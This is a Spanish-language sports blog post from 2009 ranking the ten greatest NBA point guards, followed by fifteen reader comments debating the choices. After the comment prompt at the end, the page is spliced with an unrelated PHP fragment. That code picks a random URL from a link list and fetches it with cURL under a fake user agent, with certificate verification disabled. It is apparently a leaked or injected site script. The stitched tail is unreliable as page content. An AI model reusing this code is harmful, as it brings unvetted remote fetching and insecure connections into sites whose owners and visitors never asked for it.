Los mejores bases de la historia

05 de August de 2009 por TheDeerHunter
Artículo 5 de 7 de la serie Los mejores de la historia

Y llegamos por fin a la posición por antonomasia. A los hombres que marcan el tempo del partido y dirigen los movimientos de sus compañeros con precisión de relojero. Durante toda la liga los estilos de juego han ido cambiando y han evolucionado pero siempre ha habido BASES:

1.-Magic Johnson: El 32 dorado y púrpura representa el éxtasis del baloncesto en su conjunto. La máxima expresión colectiva y también la rivalidad más apasionante contra su némesis Bird y los Celtics. Se trata del jugador más completo que ha existido, capaz de haber jugado competitivamente en todas las posiciones. Sus 2,05 de estatura, velocidad y talento así se lo permitían. Su importancia, sin embargo, radica en que alrededor suyo se cerró un círculo único y perfecto en el que la fantasía y el rigor táctico se unieron. El Showtime marcó el sentido de espectáculo artístico que siempre ha perseguido este deporte. Pero lo que a los ojos del espectador era improvisación para los jugadores era, como en el buen intérprete, el resultado de duro trabajo hasta alcanzar la precisión matemática. Nunca se dio un pase sin mirar como mero artificio ni como un menosprecio al contrario. Todos se intentaban como el arma más peligrosa de todas: La impredecibilidad infinita. Pero lo más impresionante de todo era el sentido lúdico que lograban transmitir, porque la expresividad de Magic, casi teatral, contagiaba al público de la diversión que ellos parecían disfrutar dentro de la cancha. Esa fue una de las claves del éxito, porque el golpe de estado era contra el mismísimo genio de Kareem Abdul-Jabbar. En condiciones normales hubiera supuesto un cisma de magnitudes legendarias y, sin embargo, la sucesión fue natural hasta lo invisible. Fue el pívot quien abdicó de buena gana ante aquel divertimento en lugar de la competitividad extrema que siempre le había movido. Su forma de mostrarse agradecido fue alargar su carrera hasta casi lo indecible. Juntos perdieron casi tantas finales como las muchas que ganaron pero siempre las disputaron como si fuera la vida en ello. Y nosotros que pudimos disfrutar de todo aquello.

2.-Oscar Robertson: “Big O” es el más explosivo de todos los bases habidos y uno de los más poderosos jugadores de toda la historia. Se trata de otro marciano, capaz de promediar en una temporada los 31 puntos, 12,5 rebotes y 11,5 asistencias que, pasados 50 años nadie ha superado. Su capacidad para registrar triples dobles era y es inigualable. El jugador globalmente más productivo que ha existido. Con un 1,96 de estatura poseía muelles en las piernas, pero era su visión de juego lo que le permitía realmente marcar las diferencias. El prototipo de base-escolta, eminentemente anotador. Su principal arma era una suspensión de 4-5 metros que su increíble capacidad de salto hacía casi indefendible. Pero era la época de los West, Baylor o “Hondo”, y aquello no hubiera sido suficiente para destacar. Ni siquiera su talento reboteador. Él, en un equipo limitado como lo eran los Cincinnati Royals lograba regalar sus 10 asistencias por partido sin despeinarse. No imaginamos cuantas hubiera dado de haber tenido compañeros más talentosos. Esa manera de combinarse casi telepáticamente es lo que le hacía realmente único. Fue en los Bucks en el 71, con sus piernas ya en cierta decadencia, donde logró el ansiado anillo aportando su experiencia al proyecto que se iba formando alrededor del joven Alcindor. No le hubiera hecho falta. Como en algunos otros casos su grandeza trasciende cualquier otra consideración.

3.-Bob Cousy: El distribuidor por antonomasia. El mejor base con diferencia de los 50. El cerebro de los Celtics de Auerbach que rompió los esquemas al viejo genio, mostrándole la eficacia de los pases sin mirar o por detrás de la espalda. Un jugador distinto en un equipo diseñado para la austeridad. Ambidiestro y superdotado en el control del balón, todos tenemos en la retina esa típica imagen de Cousy, bota que te bota como un yo-yo, manteniendo la posesión perseguido por todos los jugadores del equipo contrario. Lo que Russell daba a la defensa de aquel super-equipo el “Houdini of the Harwood” se lo daba en ataque. Fue al retirarse cuando le preguntaron a Auerbach de qué forma se las iba a arreglar para sustituir a su base MVP. Red contestó evidentemente emocionado: “Sustituirle es imposible, porque él es Mr. Basketball”.

4.-John Stockton: Representaba el ideal de base. Definía todas las cualidades que debe de tener el “point guard” clásico. Un manejo de balón sobrio, una visión de juego periférica, un tiro exterior sólido y un control emocional sin fisuras. Su apariencia vulnerable escondía un defensor feroz, listo como el hambre y duro como el granito. Son míticos sus bloqueos, calificado por el mismísimo Rodman como el “mayor asesino en pantalones cortos”. Sacralizó el “pick&roll” junto a su compinche Malone convirtiendo la jugada en un algoritmo. No podemos decir algo ejecutado tan mecánicamente apasionara demasiado, pero su eficacia es incuestionable hasta el punto de haberse convertido en el “abc” de la mayoría de equipos de la liga. Se retiró como líder de asistencias y de robos de balón. Su estilo serio y eficaz es el contrapunto a la creatividad de Magic y sin embargo ambos demostraron ser complementarios en el Dream Team. Ese fue su mayor éxito.

5.-Isiah Lord Thomas III: “El asesino de la carita de niño” es el alma de los “Bad Boys”. Uno de los “bajitos” más letales de todos los tiempos. Su estilo vertiginoso era perfecto para los contragolpes que generaba aquella terrible defensa, desbordando continuamente con eléctricas penetraciones y balones doblados de todas las formas imaginables. Pero aquel torbellino no era el descontrol que prometía su rapidez, su distribución era fina y precisa con una producción de asistencias mastodóntica. Originario de los barrios más pobres y peligrosos de Chicago, heredó el coraje de su madre, Mary Thomas, célebre inspiración de un telefilm que narraba cómo plantó cara a las bandas callejeras. No es de extrañar que “Zeke” no temiera nunca lanzarse de cabeza a la “mascletá” de golpes que siempre le caía en cuanto ponía un pie en la zona. Fue aquel mítico equipo quienes enterrarían para siempre la hegemonía de los Lakers&Celtics de los 80 y quienes convirtieron la franquicia en leyenda. No fue suficiente para poder pertenecer al Dream Team. Cosas de tener como gran enemigo a Jordan.

6.-“The Pistol” Pete Maravich: Hay gente que posee un halo especial, casi místico. Pete era grande antes quizás de pisar una verdadera cancha de baloncesto. Era un superdotado, un “freak” del baloncesto desde su más tierna infancia. Como no tenía fuerza suficiente para lanzar frontalmente lo hacía entonces desde el lateral, como si apuntara con una pistola y de ahí el célebre sobrenombre. Su estilo era literalmente visionario. Nadie hasta entonces había visto los movimientos y pases que inventó, sin contar con el amplio rango de tiro que dominaba, teniendo en cuenta que no existía línea de tres. Su personalidad introvertida, su imagen un tanto descuidada acrecentaba su romanticismo. La eterna derrota y una muerte prematura a causa de un defecto congénito augurada por él mismo 15 años antes terminó de perfilar la leyenda. Más que un ídolo. Un inmortal.

7.-Steve Nash: Durante la última década únicamente Duncan había repetido MVP antes que el canadiense. Ningún base lo había ganado desde 1990. Es el eje del ideal de juego más atractivo de los últimos años, capaz de cambiar de un plumazo la dinámica conservadora que se había instalado en la liga. Ahora varios equipos tratan de poner en práctica el “run&gun” o el “small ball” con cuatro bajos que tanto espectáculo lleva brindado a los aficionados de los Suns y entre medio de los Mavericks. No se ha logrado la matrícula de honor. Determinadas circunstancias azarosas de cuyos detalles no queremos ni recordar les privaron de alcanzar su verdadero objetivo, pero han sido definitivamente ellos los que han logrado demostrar que el modelo ofensivo de juego sigue estando plenamente vigente y que se puede lograr con él la victoria. Es el heredero directo de Cousy y Maravich. Eso ya no se lo va a quitar nadie.

8.-Walt Frazier: Le apodaban “Clyde”, por los famosos bandoleros “Bonnie&Clyde”. Poseía, según decían, una rapidez de manos comparable a la de la lengua de un lagarto. Lástima que no se contabilizaran sus robos durante la primera mitad de su carrera. Fue 7 veces elegido para el equipo defensivo de la liga, tal era su categoría en este aspecto del juego. Ofensivamente era un gran distribuidor, con visión de juego periférica y un sólido anotador y reboteador. Fue el cerebro de los mejores Knicks de la historia, ganadores de dos campeonatos. Con todo, lo que realmente hizo de Frazier alguien verdaderamente mítico fue su actuación en el 7º partido de la final de 1970, contra los Lakers de Chamberlain, West y Baylor, con Willis Reed, el mejor jugador y líder de aquellos Knicks, lesionado. Cuando todo parecía perdido Frazier se destapó con 36 puntos, 19 asistencias y 5 robos en lo que se conoce como la final más emocionante de la historia. Eso sí que fue “dar un golpe” en toda regla.

9.-Jason Kidd: Es el hombre triple doble de nuestro tiempo. El mejor heredero de Robertson y Magic. Sus grandes virtudes han sido su excelencia defensiva y su capacidad para organizar imparables contragolpes. Algunos de los mejores alley-hoops que se han visto han salido de la precisión de uno de sus pases. Su única incorporación convirtió al equipo pobre de los Nets en todo un candidato al anillo. Su presencia hizo que el resto de los miembros del equipo mejoraran significativamente sus prestaciones de forma automática, normal teniendo en cuenta la suma facilidad con la que creaba asistencias de la nada. Hasta en dos ocasiones se les escapó el título de entre los dedos. No ocurre lo mismo con la selección USA, de la que ha sido base titular durante la última década.

10.-Gary Payton: Es el “Guante”. El único base capaz de ser elegido mejor defensor del año hasta la fecha. Su estilo divertidamente arrogante, de “jugón” por antonomasia, condicionaba el juego de todos, propios y ajenos. Defensivamente era un fuera de serie, como su apodo bien indica. Llegó a marcarse sus 3 robos por partido en alguna temporada, un desquicie absoluto para sus rivales. En ataque era especialmente hábil al poste bajo y un pasador sensacional. Un tanto anárquico eso sí, su estilo no cuajó con “los 4 fantásticos” de Phil Jackson tras haberlo sido todo en Seattle. Allí se le recordará con el mejor de los recuerdos, habiendo formado junto a Shawn Kemp una de las parejas más dinámicas y espectaculares de la historia, capaces de plantarle cara al mismísimo Jordan. Además de dos oros olímpicos en la vitrina de su casa, su palmarés se completa con el anillo que ganó en Miami actuando como jugador de intendencia.

Comenta

15 comentarios a esta entrada

  1. pcerezo dice:
    #1

    Voy a meter el primer comentario y por supuesto la primera crítica…jjjj

    Isiah Thomas creo que es más completo que Stockton. Está claro que “El Ordenador” era muy bueno pero un pelín más limitado. No tengo estadísticas pero seguro que los número anotadores de Thomas eran mejores. Es cuestión de matiz está claro pero me da esa sensación. También los dos anillos pesan…

    Creo que Kevin Johnson fue mejor base que lo ha sido Payton y sobre todo Kidd. También es un cuestión de sensaciones.

    Otros nombres a mencionar y que se han quedado fuera debido a que no hay sitio para todos para mi gusto serían: Hardaway, Price (buen base este), Parker creo que va a terminar haciendo una carrera realmente espectacular, Terry “me va” Porter….

    Un saludo,
    Pablo

    P.D..: Los Lakers con Odom y los Spurs con Mcdyess y Jefferson favoritos sin oposición.

      Citar

  2. Dantley2 dice:
    #2

    Creo que la mayoría son indiscutibles. Cada uno de los tres primeros, Magic, Robertson y Cousy, más Maravich, todos inventaron la posición de base. El resto es una mezcla más o menos afortunada de estos 4 (Nash mezclando Cousy y Maravich es muy buena). Creo que el más importante de todos ellos fue Cousy, es una gozada ver esos reportajes de hace tanto con el yo-yo ese que dice Deer. Creo que a partir de ahí empezó a evolucionar el baloncesto.

    Para mí el mejor también es Magic y por un largo trecho. Eso sí, repetir a Magic y a Robertson es casi imposible, son de otra especie. Y Maravich sin ser Maravich, muchos lo han intentado, por ejemplo Jason Williams.

    De mi lista personal el único que no estaría es Payton y sí Archibald, pero oye, que esté un jugón que además era un defensor tan excepcional mientras puso y quiso, tampoco está nada mal.

    Enhorabuena Deer por toda la serie, porque una cosa es hacer la lista y otra es describirla tan brillantemente.

      Citar

  3. jas dice:
    #3

    creeis q Chris Paul a poco que le salgan bien las cosas desbancará a Payton de esta lista?

      Citar

  4. xapa_croack dice:
    #4

    JAS en mis votaciones ya inclui a CP3 en el decimo lugar y escalando y payton fuera.

      Citar

  5. NBA LAKERS BLOG dice:
    #5

    Wow!! y donde está Marc Jackson, el segundo máximo asistidos de la historia de la liga? y Nash creo que está bastante arriba…

    Igual, coincido bastante con el conteo..

    Un abrazo!!!

      Citar

  6. jas dice:
    #6

    La verdad es que para mi tanto Chris Paul, Tony Parker como Billups son superiores.a Gary Payton. El primero por numeros aunque no ha ganado nada, el segundo sus numeros no son mejores pero ha ganado 3 anillos siendo especial artifice en el 2007 llegando a ser el MVP de las finales , sus numeros son mas flojos pero no es lo mismo jugar en un equipo como los bucks donde Payton era amo y señor a jugar en todos unos spurs, siempre a sido un jugador muy infravalorado a mi parecer. En cuanto a billups, un anillo siendo MVP, unos numeros no muy escandalosos pero chorrea intangibles por todos lados.

      Citar

  7. Óscar dice:
    #7

    El lunes aposté en otra entrada por esta lista de mejores bases:
    1/Oscar Robertson 2/Magic Johnson 3/Pete Maravich 4/Bob Cousy 5/John Stockton 6/Steve Nash 7/Walt Frazier 8/Nate Archibald 9/Jason Kidd 10/Isiah Thomas (o KC Jones).
    Es bastante parecida a la vuestra, se me cae Archibald por Payton y cambian las posiciones, sobre todo la de Thomas, que lo ponéis 5º.
    Respecto a los comentarios, creo que ni Hardaway ni Mark Jackson llegan al nivel de un top-10 histórico y Mark Price sí estaría entre los 10 mejores tiradores, globalmente. En cuanto a Chris Paul, se puede decir lo mismo que de LeBron en la lista de aleros: si sigue con su progresión, entrará en unos años entre los mejores bases, sin duda

      Citar

  8. Txusma dice:
    #8

    Buenos aportes Jas. Menudos 3 bases has ido a nombrar. Paul, si sigue por este camino, posiblemente superara a Payton aunq de momento sus numeros son parecidos. Lo de Parker siempre es discutible pero tendriamos que ver cuanto le debe Parker a Duncan. Podría jugar igual si fuera amo y señor como lo era Payton en los Sonics? Podría penetrar como un cuchillo si las defensas estuvieran centradas en él y no en Duncan? Nunca lo sabremos pero creo que la duda penderá siempre su cabeza. Eso si, ha sido clave en los 3 anillos de los Spurs. Y a Billups le perjudican unos números más ‘humanos’ y un despertar tardío, pero como dice es “Mr. Intangibles”.

      Citar

  9. jas dice:
    #9

    Txusma te doy toda la razón en el tema de Parker, también creo que el tema Longoria le a perjudicado bastante, pero es un jugador que todavia le queda mucho fuelle y la dinastía Duncan algún día acabará, quizás dentro de dos o tres años lo veamos asumiendo muchos mas galones, aunque como tu bien pones en duda no lo veo de macho alfa en un equipo de primera linea, si no recuerdo mal hizo unos mundiales bastante discretos siendo la estrella indiscutible de Francia.

    Quizás sea prematuro, pero ojito con Derrick Rose me parece que lo tiene todo y me transmite algo especial verle jugar.

    Y una ultima cosa fuera del tema, no se si es paranoia mia, ¿por que nadie cuenta nunca con Deron Williams? me parece un jugador completísimo con unos numeros buenisimos y una manera de jugar bastante vistosa y todavía no ha sido all-star, y sinceramente veo mas facil que llegue a conseguir meritos colectivos él que Paul… no se a lo mejor son cosas mias.

      Citar

  10. pcerezo dice:
    #10

    Oscar,

    Isiah Thomas el 10? Nash por delante de Thomas? Stockton por delante de Thomas? La carrera en la liga de Isiah Thomas es espectacular 19 puntos y 10 asistencias por partido. 2 anillos, 1 MVP de finales, 11 presencias en el All Stars, 2 veces MVP del All Star, no aparecio en el Dream Team, no por motivos deportivos sino personales con Michael Jordan (se odiaban y se odian). Creo que lo debes estar juzgando desde la perspectiva de GM y entrenador y desde ese punto de vista hay que decir que debe estar entre los tres peores de la historia.

    Hay un base que a mi personalmente me encantaba y que era un jugador tremendo. Desde mi punto de vista mejor que Jason Kidd y Steve Nash y es Kevin Johnson de los Suns. Anotador frenético y gran repartidor de juego. Acabó su carrera con 19-10. Un placer verle jugar.

    Creo que Gary Payton también es mejor jugador que Jason Kidd. Este último tiene un gran lastre en su tiro exterior (infame).

    Con Nash tengo predilección. Es una cuestión más sentimental que racional. Lo metería en la lista seguro…

    En cuanto a Parker creo que ahora es pronto para él, pero cuidado con su carrera, va a ser espectacular y un MVP de finales no está al alcance de muchos. En cuanto a lo que le debe Parker a Duncan estaríamos en la misma situación de lo que le debe Stockton a Malone. El problema de Parker es su tiro de larga distancia, claramente mejorable.

    Yo hice mención a Hardaway, Price, Mark Jackson (se me olvidó), simplemente como grandes bases, pero no están a la altura de los que se habla en la lista. Billups también estaría en este segundo pelotón. Denis Jhonson, jugador eficaz y competidor insaciable.

    Y por que no hacer mención también a un jugador tremendo que llevo la expresión base a la máxima altura y que dio auténticas lecciones en Europa: Vladis Valters.

    Un saludo,
    Pablo

      Citar

  11. Óscar dice:
    #11

    PCerezo, es complicado estar de acuerdo, siempre va a haber argumentos para demostrar o justificar nuestra opinión. Son jugadores demasiado grandes. Y no nos podemos fijar sólo en números o en palmarés individual y colectivo (aunque es fundamental, claro), sino también por ejemplo en lo que ha supuesto un jugador para cambiar la forma de jugar o entender el propio deporte, por eso pongo a Robertson como #1, y a Maravich y Cousy en el top-5, aunque por la misma razón se puede considerar a Magic también como un pionero y el primero de la lista… Isiah es irrepetible, pero los demás no lo son menos.
    En cuanto a lo que dice JAS de Derrick Rose, estoy con él, es un jugador colosal, con unas cualidades enormes en todos los sentidos. La serie vs. Boston (sobre todo el 1º partido) fue impresionante. Si mejora un poco el tiro más allá de 5 metros (más cerca es muy fiable) y sigue progresando en defensa, con el físico y la fuerza mental que tiene puede ser un grande de verdad. Recordemos que estuvo sólo un año en NCAA, problemas de exámenes falsos al margen en Memphis. Pocos le igualan en penetración y pase en contraataque. Y lo de que Deron Williams no ha sido aún all-star… es una broma, aunque es verdad que ha tenido un par de lesiones que le han pillado justo en esas fechas, como este año, que acababa de salir de lesión, como Carmelo Anthony.
    Lo que sí hay que destacar es el altísimo nivel actual de los bases en la NBA, posiblemente de los mejores de la Historia (debatible): Paul, Nash, Kidd, Williams, Parker, Billups, Calderón, Rose, Nelson, Rondo, Miller, Harris, Bibby… es increíble, para disfrutar.
    Y recordar, por último, el Draft de este año, con 10 bases entre los 21 primeros: Evans(4), Rubio(5), Flynn(6), Curry(7), Jennings(10), Holiday(17), Lawson(18), Teague(19), Maynor(20) y Collison(21). Casi nada.
    P.D. Ojo a Eric Maynor (VCU), que ya ha firmado Utah. Un base muy completo, apuesto por él como una de las sorpresas de este año, a pesar de salir en el #20.
    Saludos.

      Citar

  12. Dantley2 dice:
    #12

    Pablo, me has tocado la fibra sensible con Valdis Valters, era uno de mis europeos favoritos, pura clase. Oscurecido quizá por tanto talento que tenía a su alrededor, pero se sacaba de la manga jugadas imposibles.

    Óscar, es interesante lo que dices de los bases actuales, pero creo que están por debajo de la de los 80, aunque también hay que tener en cuenta que Kidd y Nash ya están en la parte final de su carrera, pero en los 80 con todos los que han salido creo que había más talento. De los actuales, que aspiren a ser muy grandes sólo veo a Paul, Deron Williams (de acuerdo en que se le infravalora), lo que de Parker en lo que le queda (aunque con dudas, porque no sé, quizá le falta ese aire de base puro que sí tienen otros) y Rose que ahora mismo no tiene límites.

      Citar

  13. PEDRO dice:
    #13

    EL MEJOR BASE DE TODA LA HISTORIA,BUFF!!! ES MUY COMPLICADO,PERO BUENO CREO QUE POR TODO LO QUE CONQUISTO Y LO QUE SIGNIFICO SU ENTRADA EN LA NBA.PARA MI ES EL GRAN “MAGIC”
    JOHNSON,LO TENIA TODO,VISION DE JUEGO,ANOTADOR,REBOTEADOR Y SOBRE TODO LIDERAZGO.
    TODOS LOS QUE HAS COMENTADO HAS ACERTADO DE PLENO PERO TE FALTA UN BASE QUE EN LOS A?OS 90 ME ENCANTABA TIM HARDAWAY,TENIA UNOS CAMBIOS DE DE DIRECCION INCREIBLES.

      Citar

  14. TheDeerHunter dice:
    #14

    Hola Pedro,
    No te creas, ni de lejos, que olvidamos a Penny Hardaway, que nos deslumbró a todos en la irrupción de Shaquille a la liga. Te puedo asegurar que fue uno de mis favoritos en los 90 (todavía recuerdo con malicioso placer aquel robo a MJ que les dejó en la cuneta)
    Por desgracia, su esplendor fue fugaz. Un gran año de rookie ganando el MVP del all-star de jóvenes. Un par de años increíbles de +20ptos, casi 8 asistencias y 2 robos, siendo subcampeón y oro olímpico… a partir de ahí, pasó a jugar más de escolta y fue de lesión en lesión. Jamás volvió a ser el mismo.
    Sus años en phoenix reguleros… y después se dedicó a arrastrarse por aquí y por allá. No son méritos suficientes como para quitarle a ninguno de los que hemos mencionado el top 10. Más méritos hubiera tenido Archibald, desde luego… aunque a él no lo vieramos jugar.

      Citar

  15. Luis dice:
    #15

    ISIAH THOMAS #11 mucho mejor que Payton, Nash, Pistol, Kidd y compañia!!!
    Para mi el mejor y sino, seguro que deberia estar entre los 3 mejores bases de todos los tiempos, vean todos sus records y títulos. El mayor pecado baloncestistico fue que no formase parte del Dream Team junto con el gran Shaq

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>